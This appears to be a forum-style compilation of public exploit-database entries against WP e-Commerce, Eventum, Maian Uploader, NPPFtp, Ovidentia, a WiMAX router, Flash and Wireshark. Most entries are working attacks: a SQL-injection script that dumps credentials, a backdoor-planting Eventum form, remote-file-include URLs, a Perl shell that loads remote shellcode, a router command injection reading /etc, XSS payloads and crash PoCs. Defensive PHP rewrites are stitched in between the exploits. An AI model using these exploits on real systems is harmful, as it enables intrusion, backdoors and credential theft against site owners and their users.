
Everything posted by HireHackking
-
WordPress Plugin WP E-Commerce - Multiple Vulnerabilities
source: https://www.securityfocus.com/bid/65130/info

The WP e-Commerce plugin for WordPress is prone to multiple security vulnerabilities, including:

1. Multiple remote code-execution vulnerabilities.
2. A local file-include vulnerability.
3. An arbitrary file-upload vulnerability.

An attacker can exploit these issues to execute arbitrary code, include arbitrary local files, or upload arbitrary files to the affected computer, which may result in arbitrary code execution within the context of the vulnerable application.

WP e-Commerce 3.8.9.5 is vulnerable; other versions may also be affected.

Local file-include:

http://www.example.com/wp-e-commerce/wpsc-includes/misc.functions.php?image_name=[LFI]

Remote code-execution:

http://www.example.com/wp-e-commerce/wpsc-admin/ajax.php?wpsc_action=[CMD]
http://www.example.com/wp-e-commerce/wpsc-admin/display-sales-logs.php?c=[CMD]
-
Eventum - Insecure File Permissions
source: https://www.securityfocus.com/bid/65186/info

Eventum is prone to an insecure file-permission vulnerability.

An attacker can exploit this issue to reinstall the vulnerable application. This may aid in further attacks.

Eventum 2.3.4 is vulnerable; other versions may also be affected.

The following example URI is available:

http://www.example.com/setup/index.php
-
Maian Uploader 4.0 - Multiple Vulnerabilities
source: https://www.securityfocus.com/bid/65137/info

Maian Uploader is prone to multiple security vulnerabilities, including:

1. An SQL-injection vulnerability
2. Multiple cross-site scripting vulnerabilities

Attackers can exploit these issues to access or modify data, exploit latent vulnerabilities in the underlying database, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

Maian Uploader 4.0 is vulnerable; other versions may also be affected.

[+] Exploit (1) 'SQL Injection':

<?php
/*
 - move.php (lines 90-92)
 $q_acc = mysql_query("SELECT id,username FROM ".$database['prefix']."members
           WHERE id != '".$_POST['id']."'
           ORDER BY accname") or die(mysql_error());
*/

$sqli = "SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,ftp_user,0x3a,ftp_pass SEPARATOR 0x2c20) FROM mu_members";

$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, "http://[target]/[path]/admin/data_files/move.php");
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, "id=$sqli");
$exploit = curl_exec($ch);
curl_close($ch);
unset($ch);
echo $exploit;
?>

[+] Exploit (2) 'XSRF/XSS':

- load_flv.js.php (line 25)

document.write('<object type="application/x-shockwave-flash" .....
width="<?php echo $_GET['width']; ?>" height="<?php echo $_GET['height']; ?>

XSS: "><h1>XsS by KedAns-Dz</h1>
XSS: "><script>Alert('XsS by KedAns-Dz');</script>

http://127.0.0.1/uploader/admin/js/load_flv.js.php?width=[ XSS ]
http://127.0.0.1/uploader/js/load_flv.js.php?width=[ XSS ]

[+] Exploit (3) 'Full Path Disclosure':

Do not put ( &height= ) after the width XSS and you get an error notice about ( Undefined index: height ) with the full path directory.
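The query quoted from move.php concatenates $_POST['id'] straight into the SQL text. As an added example (not Maian Uploader's code), here is the same lookup rewritten on mysqli with a prepared statement and an integer check on the id; the $database['prefix'] array and the members table columns are taken from the advisory, the connection details are placeholders.

```php
<?php
// Added example, not part of Maian Uploader: the members lookup from move.php
// rewritten so that the client-supplied id can never change the query's structure.
// Assumes the $database['prefix'] array and a members(id, username, accname) table
// as named in the advisory. Needs mysqlnd for get_result() (the default build).

function load_other_members(mysqli $db, array $database, $raw_id): array
{
    // The id column is numeric, so reject anything that is not a plain integer
    // before it reaches the database at all (a string like "0' OR 1=1" fails here).
    if (!is_scalar($raw_id) || filter_var($raw_id, FILTER_VALIDATE_INT) === false) {
        throw new InvalidArgumentException('id must be an integer');
    }
    $id = (int) $raw_id;

    // Table names cannot be bound as parameters, so the prefix must come from trusted
    // configuration only; whitelisting its characters is a belt-and-braces check.
    if (!preg_match('/^[A-Za-z0-9_]*$/', $database['prefix'])) {
        throw new RuntimeException('unsafe table prefix in configuration');
    }
    $table = $database['prefix'] . 'members';

    // The value travels to the server separately from the SQL text, so quotes or
    // keywords inside it are data, never syntax.
    $stmt = $db->prepare("SELECT id, username FROM `{$table}` WHERE id != ? ORDER BY accname");
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    $stmt->bind_param('i', $id);
    $stmt->execute();

    $rows = [];
    $result = $stmt->get_result();
    while ($row = $result->fetch_assoc()) {
        $rows[] = $row;
    }
    $stmt->close();
    return $rows;
}

// Usage with placeholder credentials (not real values):
// $db = new mysqli('localhost', 'dbuser', 'dbpass', 'uploader');
// $database = ['prefix' => 'mu_'];
// $members = load_other_members($db, $database, $_POST['id'] ?? '');
```

The original also relies on the mysql_* extension, which is gone from PHP 7; mysqli or PDO with bound parameters is the replacement either way.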
-
Notepad++ NPPFtp Plugin 0.26.3 - Buffer Overflow
# Title : Notepad++ NPPFtp Plugin Buffer Overflow
# Date : 19/12/2015
# Author : R-73eN
# Tested on : NPPFtp 0.26.3 (Latest Version)
# Software : http://sourceforge.net/projects/nppftp/
# Vendor : https://notepad-plus-plus.org/
#
# A buffer overflow exists in the NPPFtp plugin. When the plugin connects to a malicious server
# that serves a crafted LIST response, the application crashes.
#
# How to reproduce
#
# 1. Start this Python server
# 2. Open Notepad++, go to Plugins, NPPFtp, Show windows
# 3. Click on the gear button to create a new connection.
# 4. Create the connection to connect to the server.
# 5. Connect and the application will crash.

# Python 2 script (print statements, tuple parameters, raw_input).
import os, socket, threading, time

allow_delete = False
local_ip = "192.168.1.121"  # socket.gethostbyname(socket.gethostname())
local_port = 21
currdir = os.path.abspath('.')
buff = "rwxrwxrwx 1 1 00" + ""


class FTPserverThread(threading.Thread):
    def __init__(self, (conn, addr)):
        self.conn = conn
        self.addr = addr
        self.basewd = currdir
        self.cwd = self.basewd
        self.rest = False
        self.pasv_mode = False
        threading.Thread.__init__(self)

    def run(self):
        self.conn.send('220 Welcome!\r\n')
        while True:
            cmd = self.conn.recv(256)
            if not cmd:
                break
            else:
                print 'Received:', cmd
                try:
                    # dispatch on the first four characters of the command verb
                    func = getattr(self, cmd[:4].strip().upper())
                    func(cmd)
                except Exception, e:
                    print 'ERROR:', e
                    # traceback.print_exc()
                    self.conn.send('500 Sorry.\r\n')

    def SYST(self, cmd):
        self.conn.send('215 UNIX Type: L8\r\n')

    def OPTS(self, cmd):
        if cmd[5:-2].upper() == 'UTF8 ON':
            self.conn.send('200 OK.\r\n')
        else:
            self.conn.send('451 Sorry.\r\n')

    def USER(self, cmd):
        self.conn.send('331 OK.\r\n')

    def PASS(self, cmd):
        self.conn.send('230 OK.\r\n')
        # self.conn.send('530 Incorrect.\r\n')

    def QUIT(self, cmd):
        self.conn.send('221 Goodbye.\r\n')

    def NOOP(self, cmd):
        self.conn.send('200 OK.\r\n')

    def TYPE(self, cmd):
        self.mode = cmd[5]
        self.conn.send('200 Binary mode.\r\n')

    def CDUP(self, cmd):
        if not os.path.samefile(self.cwd, self.basewd):
            # learn from stackoverflow
            self.cwd = os.path.abspath(os.path.join(self.cwd, '..'))
        self.conn.send('200 OK.\r\n')

    def PWD(self, cmd):
        cwd = os.path.relpath(self.cwd, self.basewd)
        if cwd == '.':
            cwd = '/'
        else:
            cwd = '/' + cwd
        self.conn.send('257 \"%s\"\r\n' % cwd)

    def CWD(self, cmd):
        chwd = cmd[4:-2]
        if chwd == '/':
            self.cwd = self.basewd
        elif chwd[0] == '/':
            self.cwd = os.path.join(self.basewd, chwd[1:])
        else:
            self.cwd = os.path.join(self.cwd, chwd)
        self.conn.send('250 OK.\r\n')

    def PORT(self, cmd):
        if self.pasv_mode:
            self.servsock.close()
            self.pasv_mode = False
        l = cmd[5:].split(',')
        self.dataAddr = '.'.join(l[:4])
        self.dataPort = (int(l[4]) << 8) + int(l[5])
        self.conn.send('200 Get port.\r\n')

    def PASV(self, cmd):  # from http://goo.gl/3if2U
        self.pasv_mode = True
        self.servsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.servsock.bind((local_ip, 0))
        self.servsock.listen(1)
        ip, port = self.servsock.getsockname()
        print 'open', ip, port
        self.conn.send('227 Entering Passive Mode (%s,%u,%u).\r\n' %
                       (','.join(ip.split('.')), port >> 8 & 0xFF, port & 0xFF))

    def start_datasock(self):
        if self.pasv_mode:
            self.datasock, addr = self.servsock.accept()
            print 'connect:', addr
        else:
            self.datasock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            self.datasock.connect((self.dataAddr, self.dataPort))

    def stop_datasock(self):
        self.datasock.close()
        if self.pasv_mode:
            self.servsock.close()

    def LIST(self, cmd):
        self.conn.send('150 Here comes the directory listing.\r\n')
        self.start_datasock()
        for t in os.listdir(self.cwd):
            k = self.toListItem(os.path.join(self.cwd, t))
            # the crafted listing line goes out instead of the real entry
            self.datasock.send(buff + buff + buff + '\r\n')
            print "[+] Crafted packet sent . . . [+]"
            # self.datasock.send(buff + buff + '\r\n')
        self.stop_datasock()
        self.conn.send('226 Directory send OK.\r\n')

    def toListItem(self, fn):
        st = os.stat(fn)
        fullmode = 'rwxrwxrwx'
        mode = ''
        for i in range(9):
            mode += ((st.st_mode >> (8 - i)) & 1) and fullmode[i] or '-'
        d = (os.path.isdir(fn)) and 'd' or '-'
        ftime = time.strftime(' %b %d %H:%M ', time.gmtime(st.st_mtime))
        return d + mode + ' 1 user group ' + str(st.st_size) + ftime + os.path.basename(fn)

    def MKD(self, cmd):
        dn = os.path.join(self.cwd, cmd[4:-2])
        os.mkdir(dn)
        self.conn.send('257 Directory created.\r\n')

    def RMD(self, cmd):
        dn = os.path.join(self.cwd, cmd[4:-2])
        if allow_delete:
            os.rmdir(dn)
            self.conn.send('250 Directory deleted.\r\n')
        else:
            self.conn.send('450 Not allowed.\r\n')

    def DELE(self, cmd):
        fn = os.path.join(self.cwd, cmd[5:-2])
        if allow_delete:
            os.remove(fn)
            self.conn.send('250 File deleted.\r\n')
        else:
            self.conn.send('450 Not allowed.\r\n')

    def RNFR(self, cmd):
        self.rnfn = os.path.join(self.cwd, cmd[5:-2])
        self.conn.send('350 Ready.\r\n')

    def RNTO(self, cmd):
        fn = os.path.join(self.cwd, cmd[5:-2])
        os.rename(self.rnfn, fn)
        self.conn.send('250 File renamed.\r\n')

    def REST(self, cmd):
        self.pos = int(cmd[5:-2])
        self.rest = True
        self.conn.send('250 File position reset.\r\n')

    def RETR(self, cmd):
        fn = os.path.join(self.cwd, cmd[5:-2])
        # fn = os.path.join(self.cwd, cmd[5:-2]).lstrip('/')
        print 'Downloading:', fn
        if self.mode == 'I':
            fi = open(fn, 'rb')
        else:
            fi = open(fn, 'r')
        self.conn.send('150 Opening data connection.\r\n')
        if self.rest:
            fi.seek(self.pos)
            self.rest = False
        data = fi.read(1024)
        self.start_datasock()
        while data:
            self.datasock.send(data)
            data = fi.read(1024)
        fi.close()
        self.stop_datasock()
        self.conn.send('226 Transfer complete.\r\n')

    def STOR(self, cmd):
        fn = os.path.join(self.cwd, cmd[5:-2])
        print 'Uploading:', fn
        if self.mode == 'I':
            fo = open(fn, 'wb')
        else:
            fo = open(fn, 'w')
        self.conn.send('150 Opening data connection.\r\n')
        self.start_datasock()
        while True:
            data = self.datasock.recv(1024)
            if not data:
                break
            fo.write(data)
        fo.close()
        self.stop_datasock()
        self.conn.send('226 Transfer complete.\r\n')


class FTPserver(threading.Thread):
    def __init__(self):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.bind((local_ip, local_port))
        threading.Thread.__init__(self)

    def run(self):
        self.sock.listen(5)
        while True:
            th = FTPserverThread(self.sock.accept())
            th.daemon = True
            th.start()

    def stop(self):
        self.sock.close()


if __name__ == '__main__':
    ftp = FTPserver()
    ftp.daemon = True
    ftp.start()
    print 'On', local_ip, ':', local_port
    raw_input('Enter to end...\n')
    ftp.stop()
-
Eventum 2.3.4 - 'hostname' Remote Code Execution
Advisory ID: HTB23198
Product: Eventum
Vendor: Eventum Development Team
Vulnerable Version(s): 2.3.4 and probably prior
Tested Version: 2.3.4
Advisory Publication: January 22, 2014 [without technical details]
Vendor Notification: January 22, 2014
Vendor Patch: January 24, 2014
Public Disclosure: January 27, 2014
Vulnerability Type: Incorrect Default Permissions [CWE-276], Code Injection [CWE-94]
CVE References: CVE-2014-1631, CVE-2014-1632
Risk Level: Critical
CVSSv2 Base Scores: 6.4 (AV:N/AC:L/Au:N/C:N/I:P/A:P), 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

-----------------------------------------------------------------------------------------------

Advisory Details:

High-Tech Bridge Security Research Lab discovered vulnerabilities in Eventum, which can be exploited to reinstall and compromise the vulnerable application.

1) Incorrect Default Permissions in Eventum: CVE-2014-1631

The vulnerability exists due to an incorrect default permission set for installation scripts. Access to the installation script located at "/setup/index.php" is not restricted by default and the script is not deleted during the installation process. A remote attacker can access the script and reinstall the vulnerable application.

The installation script can be accessed by a remote unauthenticated user via the following URL:

http://[host]/setup/index.php

2) Code Injection in Eventum: CVE-2014-1632

The vulnerability exists due to insufficient sanitization of the HTTP POST parameter "hostname" in the "/config/config.php" script during the installation process. A remote attacker can inject and execute arbitrary PHP code on the target system with the privileges of the webserver.

Successful exploitation requires access to the application's database, which can be achieved by providing the address of an attacker-controlled MySQL server.

The following exploitation example injects a backdoor into the "/config/config.php" file:

<form action="http://[host]/setup/index.php" method="post" name="main">
<input type="hidden" name="cat" value="install">
<input type="hidden" name="hostname" value="'); eval($_GET['cmd']); $tmp=('">
<input type="hidden" name="relative" value="/">
<input type="hidden" name="db_hostname" value="db_hostname">
<input type="hidden" name="db_name" value="db_name">
<input type="hidden" name="db_table_prefix" value="db_table_prefix">
<input type="hidden" name="drop_tables" value="yes">
<input type="hidden" name="db_username" value="db_username">
<input type="hidden" name="setup[smtp][from]" value="email@email.com">
<input type="hidden" name="setup[smtp][host]" value="localhost">
<input type="hidden" name="setup[smtp][port]" value="25">
<input type="hidden" name="" value="">
<input type="submit" id="btn">
</form>

After successful reinstallation an attacker can execute arbitrary PHP code on the system. The following example executes the "phpinfo()" PHP function on the vulnerable system:

http://[host]/index.php?cmd=phpinfo%28%29;

-----------------------------------------------------------------------------------------------

Solution:

Update to Eventum 2.3.5

More Information:
https://bugs.launchpad.net/eventum/+bug/1271499

The vendor disclosed the vulnerabilities and authorized us to release the advisory publicly before our usual delay (3 weeks).

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23198 - https://www.htbridge.com/advisory/HTB23198 - Multiple Vulnerabilities in Eventum.
[2] Eventum - https://launchpad.net/eventum - Eventum is a user-friendly and flexible issue tracking system that can be used by a support department to track incoming technical support requests, or by a software development team to quickly organize tasks and bugs.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® - http://www.htbridge.com/immuniweb/ - is High-Tech Bridge's proprietary web application security assessment solution with SaaS delivery model that combines manual and automated vulnerability testing.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
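The injection works because the installer writes the submitted hostname into config.php by string concatenation inside a single-quoted PHP literal, and (as the "Insecure File Permissions" entry above notes) the installer stays reachable after installation. Added example, not Eventum's code: a config writer that serialises every value with var_export() so no input can close the literal, plus a lock check that refuses to run setup when a config already exists; the APP_ constant names and the form field names are assumed from the advisory.

```php
<?php
// Added example, not Eventum's code. Shows two fixes for the two CVEs above:
// (1) generate config.php from data, never by gluing request strings into PHP source;
// (2) refuse to run the installer once an installation exists.

/**
 * Render a config.php body. Every value goes through var_export(), which emits a
 * valid PHP literal with quotes and backslashes escaped, so the advisory's payload
 *   '); eval($_GET['cmd']); $tmp=('
 * stays inside the string literal instead of terminating it.
 */
function render_config(array $settings): string
{
    $lines = ["<?php", "// generated by the installer; edit with care"];
    foreach ($settings as $name => $value) {
        // Only identifier-like keys, so a crafted key cannot inject code either.
        if (!preg_match('/^[A-Za-z_][A-Za-z0-9_]*$/', $name)) {
            throw new InvalidArgumentException("bad setting name: $name");
        }
        if (!is_scalar($value) && $value !== null) {
            throw new InvalidArgumentException("setting $name must be scalar");
        }
        // APP_ prefix is an assumption for this example.
        $lines[] = "define('APP_{$name}', " . var_export($value, true) . ");";
    }
    return implode("\n", $lines) . "\n";
}

/**
 * Installer entry point. $configFile is the path the installer writes;
 * $post is the submitted form (e.g. $_POST).
 */
function run_setup(string $configFile, array $post): string
{
    // CVE-2014-1631 class of bug: an installer that still answers after install
    // lets anyone reinstall. Treat an existing config as a lock.
    if (file_exists($configFile)) {
        throw new RuntimeException('application already installed; setup is disabled');
    }
    // Validate the hostname as a hostname, not as free text (CVE-2014-1632 class).
    $hostname = (string) ($post['hostname'] ?? '');
    if (filter_var($hostname, FILTER_VALIDATE_DOMAIN, FILTER_FLAG_HOSTNAME) === false) {
        throw new InvalidArgumentException('invalid hostname');
    }
    $body = render_config([
        'HOSTNAME' => $hostname,
        'RELATIVE' => (string) ($post['relative'] ?? '/'),
        'DB_HOST'  => (string) ($post['db_hostname'] ?? 'localhost'),
        'DB_NAME'  => (string) ($post['db_name'] ?? ''),
    ]);
    // Write atomically and keep the file unreadable to other local users.
    $tmp = $configFile . '.tmp';
    if (file_put_contents($tmp, $body, LOCK_EX) === false || !rename($tmp, $configFile)) {
        throw new RuntimeException('could not write config');
    }
    chmod($configFile, 0640);
    return $body;
}

// Demonstration with the advisory's payload as constructed input.
$evil = ['hostname' => "'); eval(\$_GET['cmd']); \$tmp=('"];
try {
    run_setup(sys_get_temp_dir() . '/config.php.demo', $evil);
} catch (InvalidArgumentException $e) {
    // Rejected by the hostname check before anything is written.
    echo $e->getMessage(), "\n";
}
// Even without the hostname check, render_config() keeps the payload inert:
// the quotes come out backslash-escaped inside one PHP string literal.
echo render_config(['HOSTNAME' => $evil['hostname']]);
```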
-
Ovidentia online Module 2.8 - 'GLOBALS[babAddonPhpPath]' Remote File Inclusion
# Title: Ovidentia Module online 2.8 GLOBALS[babAddonPhpPath] Remote File Include Vulnerability
# Author: bd0rk
# eMail: bd0rk[at]hackermail.com
# Twitter: twitter.com/bd0rk
# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Fonline&file=online-2-8.zip&idf=832

PoC: /online-2-8/programs/admin.php line 2

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
require_once( $GLOBALS['babAddonPhpPath']."functions.php");
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[+] Exploit:

http://[target]/online-2-8/programs/admin.php?GLOBALS[babAddonPhpPath]=EVIL_SHELLCODE?

Description:

The $GLOBALS['babAddonPhpPath'] parameter isn't declared before require_once, so it's possible to compromise the web server through it. An attacker can inject some PHP shellcode. I think it's a big problem in this web software!

Patch: Declare the vulnerable parameter or use an alert.

~~Greetz: x0r_32, m0rphin, GoLd_M, zone-h.org-Team~~
-
Base64 Decoder 1.1.2 - Overwrite (SEH) (PoC)
********************************************************************************************
# Exploit: b64dec SEH OverWrite.
# Date: 12/18/2015
# Exploit Author: Un_N0n
# Vendor: Tim Rohlfs
# Software Link: http://4mhz.de/b64dec.html
# Version: 1.1.2
# Tested on: Windows 7 x64 (64bit)
********************************************************************************************

[Dump]

SEH chain of thread 00000EC0
Address   SE handler
024CFC50  b64dec.00458140
024CFC5C  b64dec.004581B3
024CFF28  b64dec.0045847C
024CFF00  41414141                 <-------
41414141  *** CORRUPT ENTRY ***    <-------

----------------------------------------------------
024CFEE4  41414141  AAAA
024CFEE8  41414141  AAAA
024CFEEC  41414141  AAAA
024CFEF0  41414141  AAAA
024CFEF4  41414141  AAAA
024CFEF8  41414141  AAAA
024CFEFC  41414141  AAAA
024CFF00  41414141  AAAA  Pointer to next SEH record  <-----
024CFF04  41414141  AAAA  SE handler                  <-----
024CFF08  41414141  AAAA
024CFF0C  41414141  AAAA
024CFF10  41414141  AAAA
024CFF14  41414141  AAAA
024CFF18  41414141  AAAA

[How to?]
1 - Open up b64dec.exe
2 - In the Search field, paste in the contents of Crash.txt
3 - Hit 'Decode'
~ The software crashes due to the SEH overwrite.

[Crash.txt?]
AAAAAAAAAAAAAAAAAAAAAAAAAA.......620 BBBB CCCC DDDDDDDDDDDDDDDDDDD
--------------------------------------|-----|
                                      NSEH  SEH

[Extra Info]
Offset = 620
********************************************************************************************
-
Ovidentia Widgets 1.0.61 - Remote Command Execution
# Title: Ovidentia Widgets 1.0.61 Remote Command Execution Exploit
# Author: bd0rk
# eMail: bd0rk[at]hackermail.com
# Twitter: twitter.com/bd0rk
# Tested on: Ubuntu-Linux
# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FLibrairies+partagees%2FWidgets&file=widgets-1-0-61.zip&idf=870
# The $GLOBALS['babInstallPath'] parameter in /programs/groups.php line 24 is vulnerable.
# Use some shellcode / c99 for example.

----------------
~~Exploitcode~~
----------------

use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;
use Getopt::Long;

sub clear {
    system(($^O eq 'MSWin32') ? 'cls' : 'clear');
}
&clear();

sub bd0rk {
    print "Ovidentia Widgets 1.0.61 Remote Command Execution Exploit\n";
    print "Sploit:\n";
    print "$0 -v \"http://[target]/path/programs/\" -shellcode \"http://[target]/shell.txt?\"\n\n";
    exit();
}

my $a = GetOptions(
    'v=s'         => \$v,
    'shellcode=s' => \$shellcode
);
&bd0rk unless ($v);
&bd0rk unless ($shellcode);
&bd0rk if $bd0rk eq 1;
chomp($v);
chomp($shellcode);

while () {
    print "[shellcode]:~\$ ";
    chomp($cmd = <STDIN>);
    if ($cmd eq "exit" || $cmd eq "quit") {
        exit 0;
    }
    my $agent = LWP::UserAgent->new;
    $in = "?&act=cmd&cmd=" . $cmd . "&d=/&submit=1&cmd_txt=1";
    chomp($in);
    my $a = $v . "/widgets-1-0-61/programs/groups.php?GLOBALS[babInstallPath]=" . $shellcode . $in;
    chomp $a;
    my $request  = HTTP::Request->new(Get => $a);
    my $resource = $agent->request($request);
    my $content  = $resource->content;
    if ($resource->is_success) {
        print $1, "\n" if ($content =~ m/readonly> (.*?)\<\/textarea>/mosix);
    } else {
        print "EXPLOIT FAILURE\n";
        exit(1);
    }
}
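Both Ovidentia entries above (babAddonPhpPath in the online module, babInstallPath in Widgets) include a file through a $GLOBALS entry that nothing in the script sets, so with register_globals the value can arrive in the query string. Added example, not Ovidentia's code: the include anchored to the add-on's own directory, with a check that the resolved file stays under it; "functions.php" is the file name from the first advisory, the directory layout is assumed.

```php
<?php
// Added example, not Ovidentia's own code. It replaces the advisories' pattern
//   require_once( $GLOBALS['babAddonPhpPath']."functions.php" );
// (and the same idea with $GLOBALS['babInstallPath'] in groups.php) with an include
// whose base directory is fixed by the script itself, not by a global that
// register_globals or a careless extract() could fill from the request.

// Anchor the add-on's PHP directory to the location of this file (layout assumed).
$babAddonPhpPath = __DIR__ . DIRECTORY_SEPARATOR;

/**
 * Resolve a PHP file that must live directly inside $baseDir.
 * Rejects URLs, absolute paths, traversal and symlinks that escape the base.
 * Returns the canonical path for require_once, or throws.
 */
function resolve_addon_file(string $baseDir, string $name): string
{
    // Only a bare file name: no separators, no scheme, no "..", .php only.
    if (!preg_match('/^[A-Za-z0-9_\-]+\.php$/', $name)) {
        throw new RuntimeException("refusing to include '$name'");
    }
    $base   = realpath($baseDir);
    $target = realpath($baseDir . DIRECTORY_SEPARATOR . $name);
    // realpath() is false for a missing file and collapses symlinks, so the
    // prefix test is done on canonical paths on both sides.
    if ($base === false || $target === false) {
        throw new RuntimeException("'$name' not found in the add-on directory");
    }
    if (strncmp($target, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException("'$name' resolves outside the add-on directory");
    }
    return $target;
}

// Done at file scope so anything functions.php defines lands in the same scope
// it would have had with the original require_once.
require_once resolve_addon_file($babAddonPhpPath, 'functions.php');

// Defence in depth in php.ini: with these off, even a path that does reach an
// include cannot pull code from a remote URL or be set from the query string.
//   allow_url_include = Off
//   register_globals  = Off   (the directive was removed entirely in PHP 5.4)
```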
-
Seowon Intech WiMAX SWC-9100 Router - '/cgi-bin/reboot.cgi' Remote Reboot (Denial of Service)
source: https://www.securityfocus.com/bid/65306/info

WiMAX SWC-9100 Mobile Router is prone to a security-bypass vulnerability and a command-injection vulnerability.

Exploiting these issues could allow an attacker to bypass certain security restrictions or execute arbitrary commands in the context of the device.

http://www.example.com/cgi-bin/reboot.cgi?select_option_value=factory_default&reboot_option=on&action=Apply
http://www.example.com/cgi-bin/reboot.cgi?select_option_value=default_reboot&reboot_option=on&action=Apply
-
Adobe Flash Sound.setTransform - Use-After-Free
Source: https://code.google.com/p/google-security-research/issues/detail?id=568

There is a use-after-free in Sound.setTransform. If a transform value is set to an object with valueOf defined, it can free the transform before the values are set. A minimal PoC is as follows:

this.createEmptyMovieClip("my_mc", 1);
var my_sound:Sound = new Sound("my_mc");
var o = {valueOf : func};
my_sound.attachSound("world");
my_sound.setTransform({ll : o, lr: 0x77777777, rr : 0x77777777, rl : 0x77777777});
my_sound.start();

function func(){
    my_mc.removeMovieClip();
    return 0x77777777;
}

A sample swf and fla are attached. Note that these PoCs will not cause a crash. Instead, they demonstrate the use-after-free by overwriting the matrix array of a ConvolutionFilter. The use-after-free changes the array from being all zeros to having values of float 0x77777777 at the end. The test fails if the second array is not all zero. The test passes if the second array is all zero. These PoCs only work on 64-bit systems.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39072.zip
-
Seowon Intech WiMAX SWC-9100 Router - '/cgi-bin/diagnostic.cgi?ping_ipaddr' Remote Code Execution
source: https://www.securityfocus.com/bid/65306/info

WiMAX SWC-9100 Mobile Router is prone to a security-bypass vulnerability and a command-injection vulnerability.

Exploiting these issues could allow an attacker to bypass certain security restrictions or execute arbitrary commands in the context of the device.

curl -v --data "select_mode_ping=on&ping_ipaddr=127.0.0.1>/dev/null; ls -lash /etc%23&ping_count=1&action=Apply&html_view=ping" "http://www.example.com/cgi-bin/diagnostic.cgi" > /dev/null
-
Wireshark - 'AirPDcapDecryptWPABroadcastKey' Heap Out-of-Bounds Read (1)
Source: https://code.google.com/p/google-security-research/issues/detail?id=657

The following crash due to a heap-based out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):

--- cut ---
==6158==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200035b1df at pc 0x0000004aaf85 bp 0x7ffcdca29930 sp 0x7ffcdca290e0
READ of size 16 at 0x60200035b1df thread T0
    #0 0x4aaf84 in __asan_memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393
    #1 0x7fc44e6a216a in AirPDcapDecryptWPABroadcastKey wireshark/epan/crypt/airpdcap.c:454:5
    #2 0x7fc44e6a0fd6 in AirPDcapRsna4WHandshake wireshark/epan/crypt/airpdcap.c:1405:21
    #3 0x7fc44e698b78 in AirPDcapScanForKeys wireshark/epan/crypt/airpdcap.c:563:13
    #4 0x7fc44e69749b in AirPDcapPacketProcess wireshark/epan/crypt/airpdcap.c:695:21
    #5 0x7fc44f596013 in dissect_ieee80211_common wireshark/epan/dissectors/packet-ieee80211.c:17767:9
    #6 0x7fc44f569dae in dissect_ieee80211 wireshark/epan/dissectors/packet-ieee80211.c:18375:10
    #7 0x7fc44e4f8cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
    #8 0x7fc44e4eb5ea in call_dissector_work wireshark/epan/packet.c:691:9
    #9 0x7fc44e4f52be in call_dissector_only wireshark/epan/packet.c:2662:8
    #10 0x7fc44e4e6ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
    #11 0x7fc44f51c032 in dissect_wlan_radio wireshark/epan/dissectors/packet-ieee80211-radio.c:975:10
    #12 0x7fc44e4f8cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
    #13 0x7fc44e4eb5ea in call_dissector_work wireshark/epan/packet.c:691:9
    #14 0x7fc44e4f52be in call_dissector_only wireshark/epan/packet.c:2662:8
    #15 0x7fc44e4e6ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
    #16 0x7fc44f52d965 in dissect_radiotap wireshark/epan/dissectors/packet-ieee80211-radiotap.c:1796:2
    #17 0x7fc44e4f8cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
    #18 0x7fc44e4eb5ea in call_dissector_work wireshark/epan/packet.c:691:9
    #19 0x7fc44e4eadbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
    #20 0x7fc44f1fa5f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
    #21 0x7fc44e4f8cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
    #22 0x7fc44e4eb5ea in call_dissector_work wireshark/epan/packet.c:691:9
    #23 0x7fc44e4f52be in call_dissector_only wireshark/epan/packet.c:2662:8
    #24 0x7fc44e4e6ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
    #25 0x7fc44e4e633b in dissect_record wireshark/epan/packet.c:501:3
